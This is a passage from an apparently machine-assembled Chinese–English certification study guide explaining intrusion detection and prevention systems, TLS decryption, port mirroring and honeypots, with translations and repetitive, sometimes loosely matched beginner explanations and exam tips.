会触发警报。 随后,它可以通过被动或主动方式作出响应。 被动响应会记录事 件并发送通知; 主动响应除了记录和发送通知外,还会更改环境以阻止该活动。 在某些情况下,您可以通过在防火墙前和防火墙后各放置一个被动 IDS来衡量防火墙的有效性。 通过检查这两个IDS中的警报,您可以确定防 火墙阻止了哪些攻击,以及哪些攻击已经穿透了防火墙。 被动响应通知可以通过多种方式发送给管理员,例如通过电子邮件或短信。 在某 些情况下,警报可以生成一份报告,详细说明导致事件发生的活动,并提供日志 供管理员在需要时获取更多信息。 许多24小时网络运营中心(NOC)都设有中央 监控屏幕,可供主支持中心的所有人员查看。 例如,一堵墙可以配备多个大型显 示屏,分别显示NOC不同元素的数据。 IDS警报可以在其中一个屏幕上显示,以 确保工作人员知晓事件。 这些即时通知有助于管理员快速有效地应对不良行为。 主动响应 主动响应可以通过多种不同方法修改环境。 典型响应包括修改防火墙 ACL以基于端口、协议和源地址阻止流量,甚至禁用特定电缆段上的所有通信。 例如,如果IDS检测到来自单个IP地址的SYN洪水攻击,IDS可以更改ACL以阻 止该IP地址的所有流量。

类似地,如果IDS检测到来自多个IP地址的ping洪水攻 击,它可以更改ACL以阻止所有ICMP流量。 本章后面的“防火墙”部分将更深 入地讨论防火墙ACL。 IDS还可以阻止可疑或行为异常的用户访问资源。 安全管 理员预先配置这些主动响应,并根据环境变化的需求进行调整。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 33 / PDF P1170

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

An IDS that uses an active response is sometimes referred to as an IPS. This is accurate in some situations. However, an IPS (described later in this section) is placed inline with the traffic. If an active IDS is placed inline with the traffic, it is an IPS. If it is not placed inline with the traffic, it isn't a true IPS because it can only respond to the attack after it has detected an attack in progress. NIST SP 800-94 recommends placing all active IDSs in line with the traffic so that they function as IPSs. Hostand Network-Based IDSs IDS types are commonly classified as host-based and network-based. A hostbased IDS (HIDS) monitors a single computer or host.

A network-based IDS (NIDS) monitors a network by observing network traffic patterns. A less-used classification is an application-based IDS, which is a specific type of network-based IDS. It monitors specific application traffic between two or more servers. For example, an application-based IDS can monitor traffic between a web server and a database server looking for suspicious activity. Host-Based IDS An HIDS monitors activity on a single computer, including process calls and information recorded in system, application, security, and host-based firewall logs. It can often examine events in more detail than an NIDS can, and it can pinpoint specific files compromised in an attack.

It can also track processes employed by the attacker. A benefit of HIDSs over NIDSs is that HIDSs can detect anomalies on the host system that NIDSs cannot detect. For example, an HIDS can detect infections where an intruder has infiltrated a system and is controlling it remotely. You may notice that this sounds similar to what anti-malware software will do on a computer. It is. Many HIDSs include anti-malware capabilities. Although many vendors recommend installing host-based IDSs on all systems, this isn't common due to some of the disadvantages of HIDSs. Instead, many organizations choose to install HIDSs only on key servers as an added level of protection.

Some of the disadvantages of HIDSs are related to the cost and usability. HIDSs are more costly to manage than NIDSs because they require administrative attention on each system, whereas NIDSs usually support centralized administration. An HIDS cannot detect

中文直译 / 整理

使用主动响应的IDS有时被称为IPS。 在某些情况下这是准确的。 然而, IPS(本节后面将描述)被部署在流量路径上。 如果主动IDS被部署在流量路 径上,它就是IPS; 如果未部署在流量路径上,则不是真正的IPS,因为它只 能在检测到正在进行的攻击后作出响应。 NIST SP 800‑94建议将所有主动 IDS部署在流量路径上,以便其作为IPS运行。 基于主机和基于网络的IDS IDS类型通常分为基于主机的和基于网络的。 一个基于主机的IDS(HIDS)监控单台计 算机或主机。 一个基于网络的IDS(NIDS)通过观察网络流量模式来监控网络。 一种较少使用的分类是基于应用程序的IDS,它是基于网络的IDS的一种特定 类型。 它监控两个或多个服务器之间的特定应用程序流量。 例如,基于应用程 序的IDS可以监控Web服务器和数据库服务器之间的流量,以查找可疑活动。 基于主机的IDS HIDS监控单台计算机上的活动,包括进程调用以及系统、应用 程序、安全和基于主机的防火墙日志中记录的信息。 它通常能比NIDS更详细地 检查事件,并能精确定位攻击中被破坏的特定文件。 它还可以跟踪攻击者使用 的进程。

HIDS相对于NIDS的一个优势是,HIDS可以检测到NIDS无法检测到的主 机系统异常。 例如,HIDS可以检测到入侵者已渗透系统并远程控制系统的 感染情况。 您可能会注意到,这听起来类似于反恶意软件在计算机上所做 的工作。 确实如此。 许多HIDS都包含反恶意软件功能。 尽管许多供应商建议在所有系统上安装基于主机的IDS,但由于HIDS的一些 缺点,这并不常见。 相反,许多组织选择仅在关键服务器上安装HIDS,以增 加一层保护。 HIDS的一些缺点与成本和可用性有关。 HIDS比NIDS更昂贵, 因为它们需要在每个系统上进行管理,而NIDS通常支持集中管理。 HIDS无法 检测

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 34 / PDF P1171

第 1171 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

network attacks on other systems. Additionally, it will often consume a significant amount of system resources, degrading the host system's performance. Although it's often possible to restrict the system resources used by the HIDS, this can result in it missing an active attack. Additionally, HIDSs are easier for an intruder to discover and disable, and their logs are maintained on the system, making the logs susceptible to modification during a successful attack. Network-Based IDS An NIDS monitors and evaluates network activity to detect attacks or event anomalies.

A single NIDS can monitor a large network by using remote sensors to collect data at key network locations that send the data to a central management console such as a security information and event management (SIEM) system, described later in this chapter. These sensors can monitor traffic at routers, firewalls, network switches that support port mirroring, and other types of network taps.

中文直译 / 整理

其他系统上的网络攻击。 此外,它通常会消耗大量系统资源,降低主机系统 的性能。 尽管通常可以限制HIDS使用的系统资源,但这可能导致其错过正在 进行的攻击。 此外,HIDS更容易被入侵者发现和禁用,且其日志保存在系统 上,使得日志在成功攻击期间容易被篡改。 基于网络的入侵检测系统 一种网络入侵检测系统(NIDS)监控和评估网络活动, 以检测攻击或事件异常。 单个NIDS可以通过使用远程传感器在关键网络位置收 集数据,并将数据发送到中央管理控制台(例如本章后面将介绍的安全信息和事 件管理系统(SIEM)),从而监控大型网络。 这些传感器可以监控路由器、防 火墙、支持端口镜像的网络交换机以及其他类型的网络分流器上的流量。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1171 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 35 / PDF P1172

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Monitoring Encrypted Traffic Most internet traffic is encrypted using Transport Layer Security (TLS) with HTTPS. Although encryption helps ensure data privacy in transit as it travels over the internet, it also presents challenges for IDPSs. As an example, imagine a user unwittingly establishes a secure HTTPS session with a malicious site. The malicious site then attempts to download malicious code to the user's system through this channel. Because the malicious code is encrypted, the IDPS cannot examine it, and the code gets through to the client. Similarly, many botnets have used encryption to bypass inspection by an IDPS.

When a bot contacts a command-and-control server, it often establishes an HTTPS session first. It can use this encrypted session to send harvested passwords and other collected data, and receive commands from the server for future activity. One solution that many organizations have begun implementing is the use of TLS decryptors, sometimes called SSL decryptors. A TLS decryptor detects TLS traffic, takes steps to decrypt it, and sends the decrypted traffic to an IDPS for inspection.

This can be very expensive in terms of processing power, so a TLS decryptor is often a stand-alone hardware appliance dedicated to this function, but it can be within an IDPS solution, a next-generation firewall, or some other appliance. Additionally, it is typically placed inline with the traffic, ensuring that all traffic to and from the Internet passes through it. The TLS decryptor detects and intercepts a TLS handshake between an internal client and an internet server. It then establishes two HTTPS sessions. One is between the internal client and the TLS decryptor; the second is between the TLS decryptor and the Internet server.

Although the traffic is transmitted using HTTPS, it is decrypted on the TLS decryptor. There is a weakness with TLS decryptors, though. Advanced persistent threats (APTs) often encrypt traffic before exfiltrating it out of a network. The encryption is typically performed on a host before establishing a connection with a remote system and sending it. Because the traffic is encrypted on the client and not within a TLS session, the TLS decryptor cannot decrypt it. Similarly, an IDPS may be able to detect that this traffic

中文直译 / 整理

监控加密流量 大多数互联网流量使用传输层安全协议(TLS)通过HTTPS进行加密。 尽管加密 有助于确保数据在通过互联网传输时的隐私性,但它也为IDPS带来了挑战。 例如,假设用户无意中与一个恶意网站建立了安全的 HTTPS 会话。 该恶意 网站随后试图通过此通道向用户的系统下载恶意代码。 由于恶意代码是加 密的,IDPS 无法检查它,因此代码得以传送到客户端。 类似地,许多僵尸网络已使用加密技术来规避 IDPS 的检测。 当僵尸程序 联系命令与控制服务器时,通常会首先建立一个 HTTPS 会话。 它可以通 过此加密会话发送窃取的密码和其他收集的数据,并接收服务器发来的后 续操作指令。 许多组织已经开始实施的一种解决方案是使用 TLS 解密器,有时也称为 SSL 解密器。 TLS 解密器检测 TLS 流量,采取措施对其进行解密,然后将 解密后的流量发送给 IDPS 进行检查。 这在处理能力方面可能非常昂贵, 因此 TLS 解密器通常是一种专用的独立硬件设备,但也可以集成在 I DPS 解决方案、下一代防火墙或其他设备中。 此外,它通常以串联方式部署在流量路径中,确保所有进出互联网的流量都经过 它。

TLS 解密器检测并拦截内部客户端与互联网服务器之间的 TLS 握手,然 后建立两个 HTTPS 会话:一个是内部客户端与 TLS 解密器之间的会话; 另一个是 TLS 解密器与互联网服务器之间的会话。 尽管流量使用 HTTPS 传输,但它在 TLS 解密器上被解密。 然而,TLS解密器存在一个弱点。 高级持续性威胁(APTs)通常在将流量 从网络中外传之前对其进行加密。 加密通常在主机上建立与远程系统的连 接并发送数据之前完成。 由于流量是在客户端加密的,而不是在TLS会话 内加密的,因此TLS解密器无法解密它。 同样,IDPS可能能够检测到此流 量

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 36 / PDF P1173

第 1173 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

is encrypted, but it won't be able to decrypt the traffic so that it can inspect it. Switches are often used as a preventive measure against rogue sniffers. If the IDS is connected to a normal port on the switch, it will capture only a small portion of the network traffic, which isn't very useful. Instead, the switch can be configured to mirror all traffic to a specific port (commonly called port mirroring) used by the IDS. On Cisco switches, the port used for port mirroring is referred to as a Switched Port Analyzer (SPAN) port. The NIDS central console is often installed on a hardened single-purpose computer.

This reduces vulnerabilities in the NIDS and can allow it to operate almost invisibly, making it much harder for attackers to discover and disable it. An NIDS has very little negative effect on the overall network performance. When it is deployed on a single-purpose system, it doesn't adversely affect any other computer's performance. On networks with large volumes of traffic, a single NIDS may be unable to keep up with the flow of data, but adding additional systems to balance the load is possible. An NIDS can often discover the source of an attack by performing Reverse Address Resolution Protocol (RARP) or reverse DNS lookups.

However, because attackers often spoof IP addresses or launch attacks by bots via a botnet, additional investigation is required to determine the actual source. This can be a laborious process and is beyond the scope of the IDS. However, it is possible to discover the source of spoofed IPs with some investigation. It is unethical, risky, and often illegal to launch counterstrikes against an intruder or to attempt to reverse-hack an intruder's computer system. Instead, rely on your logging capabilities and sniffing collections to provide sufficient data to prosecute criminals or improve your environment's security.

An NIDS can usually detect the initiation of an attack or ongoing attacks, but it can't always provide information about an attack's success. It won't know if

中文直译 / 整理

是加密的,但无法解密该流量以进行检查。 交换机通常用作防止恶意嗅探的预防措施。 如果IDS连接到交换机的普 通端口,它只能捕获一小部分网络流量,这并没有太大用处。 相反,可以 将交换机配置为将所有流量镜像到一个特定端口(通常称为端口镜像), 供IDS使用。 在思科交换机上,用于端口镜像的端口被称为交换端口分析器 (SPAN)端口。 NIDS中央控制台通常安装在经过加固的专用计算机上。 这可以减少NIDS的漏 洞,并使其几乎无法被发现,从而大大增加攻击者发现和禁用它的难度。 NIDS对整体网络性能的影响非常小。 当它部署在专用系统上时,不会对其他计 算机的性能产生不利影响。 在流量庞大的网络中,单个NIDS可能无法跟上数据 流的速度,但可以通过添加额外的系统来分担负载。 网络入侵检测系统(NIDS)通常可以通过执行反向地址解析协议(RARP)或 反向DNS查找来发现攻击的来源。 然而,由于攻击者经常伪造IP地址或通过僵 尸网络由机器人发起攻击,因此需要进一步调查才能确定实际来源。 这可能是 一个繁琐的过程,超出了入侵检测系统的范围。 但通过一些调查,仍有可能发 现伪造IP的来源。

对入侵者发起反击或尝试反向入侵入侵者的计算机系统是不道德的、 有风险的,且常常是违法的。 相反,应依靠日志记录功能和嗅探收集的数 据,以提供足够的证据来起诉罪犯或提升您环境的安全性。 网络入侵检测系统(NIDS)通常可以检测到攻击的发起或正在进行的攻击,但并 不能总是提供有关攻击是否成功的信息。 它无法知道

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1173 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 37 / PDF P1174

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

an attack affected specific systems, user accounts, files, or applications. For example, an NIDS may discover that an attacker sent a buffer overflow exploit through the network, but it won't necessarily know whether the exploit successfully infiltrated a system. However, after administrators receive the alert, they can check relevant systems. Additionally, investigators can use the NIDS logs as part of an audit trail to learn what happened. Intrusion Prevention Systems An intrusion prevention system (IPS) is a special type of active IDS that attempts to detect and block attacks before they reach target systems.

A distinguishing difference between an NIDS and a network-based IPS (NIPS) is that the NIPS is placed inline with the traffic, as shown in Figure 17.4. In other words, all traffic must pass through the NIPS and the NIPS can choose what traffic to forward and what traffic to block after analyzing it. This allows the NIPS to prevent an attack from reaching a target. FIGURE 17.4 Intrusion prevention system In contrast, an active NIDS that is not placed inline can check the activity only after it has reached the target. The active NIDS can take steps to block an attack after it starts but cannot prevent it.

An NIPS can use knowledge-based detection and/or behavior-based detection, just like any other IDS. Additionally, it can log activity and provide notification to administrators just as an IDS would.

中文直译 / 整理

攻击是否影响了特定的系统、用户账户、文件或应用程序。 例如,NIDS 可能发 现攻击者通过网络发送了缓冲区溢出攻击,但它不一定知道该攻击是否成功渗 透了系统。 然而,管理员收到警报后,可以检查相关系统。 此外,调查人员可 以将 NIDS 日志作为审计跟踪的一部分,以了解发生了什么。 入侵防御系统 一个 入侵防御系统(IPS) 是一种特殊类型的主动入侵检测系统,旨在检测并 阻止攻击在到达目标系统之前发生。 网络入侵检测系统(NIDS)与基于网络 的入侵防御系统(NIPS)之间的显著区别在于,NIPS被部署在流量路径上, 如 图17.4所示。 换句话说,所有流量都必须经过NIPS,NIPS在分析后可以选 择转发或阻断特定流量。 这使得NIPS能够防止攻击到达目标。 图17.4 入侵防御系统 相比之下,未部署在流量路径上的主动NIDS只能在攻击到达目标后检查其活动。 主动NIDS可以在攻击开始后采取措施进行阻断,但无法阻止攻击的发生。 NIPS 可以使用基于知识的检测和/或基于行为的检测,就像任何其他 IDS 一样。 此外,它还可以记录活动并向管理员发出通知,就像 IDS 一样。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 38 / PDF P1175

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A current trend is the replacement of NIDSs with NIPSs. This can often be done by placing the NIDS inline with the traffic, as shown in Figure 17.4. This allows the device to analyze all the traffic because all the traffic goes through the device, and the device chooses what traffic to forward and what traffic to block. Similarly, many appliances that include detection and prevention capabilities focus their use on an NIPS. Because an NIPS is placed inline with the traffic, it can inspect all traffic as it occurs.

Specific Preventive Measures Although intrusion detection and prevention systems go a long way toward protecting networks, administrators typically implement additional security controls to protect their networks. The following sections describe several of these as additional preventive measures. Honeypots and Honeynets Honeypots are individual computers created as a trap or a decoy for intruders or insider threats. A honeynet is two or more networked honeypots used together to simulate a network. They look and act like legitimate systems, but they do not host data of any real value for an attacker.

Administrators often configure honeypots with vulnerabilities to tempt intruders into attacking them. They may be unpatched or have security vulnerabilities that administrators purposely leave open. The goal is to grab intruders’ attention and keep them away from the legitimate network that is hosting valuable resources. Legitimate users wouldn't access the honeypot, so any access to a honeypot is most likely an unauthorized intruder. In addition to keeping the attacker away from a production environment, the honeypot allows administrators to observe an attacker's activity without compromising the live environment.

In some cases, the honeypot is designed to delay an intruder long enough for the automated IDS to detect the intrusion and gather as much information about the intruder as possible. The longer the attacker spends with the honeypot, the more time an administrator has to investigate the attack and potentially identify the intruder. Some security professionals, such as those engaged in security research, consider

中文直译 / 整理

当前的趋势是用 NIPS 替代 NIDS。 这通常可以通过将 NIDS 部署在流 量路径中来实现,如 图 17.4所示。 这使得设备能够分析所有流量,因为所 有流量都经过该设备,设备可以选择转发哪些流量以及阻止哪些流量。 同 样,许多包含检测和防护功能的设备都将重点放在 NIPS 上。 由于 NIPS 部署在流量路径中,它可以实时检查所有流量。 具体预防措施 尽管入侵检测和预防系统在保护网络方面发挥了重要作用,但管理员通常还会 实施额外的安全控制措施来保护其网络。 以下部分将介绍其中几种作为额外预 防措施的方法。 蜜罐与蜜网 蜜罐是作为诱捕入侵者或内部威胁的陷阱或诱饵而创建的单台计算机。 蜜网是 两个或多个联网的蜜罐,共同模拟一个网络。 它们外观和行为都类似于合法系 统,但不包含任何对攻击者具有真实价值的数据。 管理员通常会配置蜜罐以引 入漏洞,引诱入侵者攻击它们。 这些蜜罐可能是未打补丁的,或管理员故意保 留其安全漏洞。 其目标是吸引入侵者的注意力,使其远离托管重要资源的合法 网络。 合法用户不会访问蜜罐,因此任何对蜜罐的访问都极有可能是未经授权 的入侵者。

除了将攻击者与生产环境隔离外,蜜罐还允许管理员在不影响实时环境的情况 下观察攻击者的活动。 在某些情况下,蜜罐的设计目的是延缓入侵者足够长的 时间,以便自动化入侵检测系统能够发现入侵并尽可能收集有关入侵者的信息。 攻击者在蜜罐上花费的时间越长,管理员就越有时间调查攻击并可能识别出入 侵者。 一些安全专业人员,例如从事安全研究的人员,认为

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 39 / PDF P1176

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

honeypots to be effective countermeasures against zero-day exploits because they can observe the attacker's actions. Honeypots and honeynets can be placed anywhere on a network, but administrators often host them on virtual systems. These are much simpler to re-create after an attack. For example, administrators can configure the honeypot and then take a snapshot of a honeypot virtual machine. If an attacker modifies the environment, administrators can revert the machine to the state it was in when they took the snapshot. When using VMs, administrators should monitor the honeypot or honeynet closely.

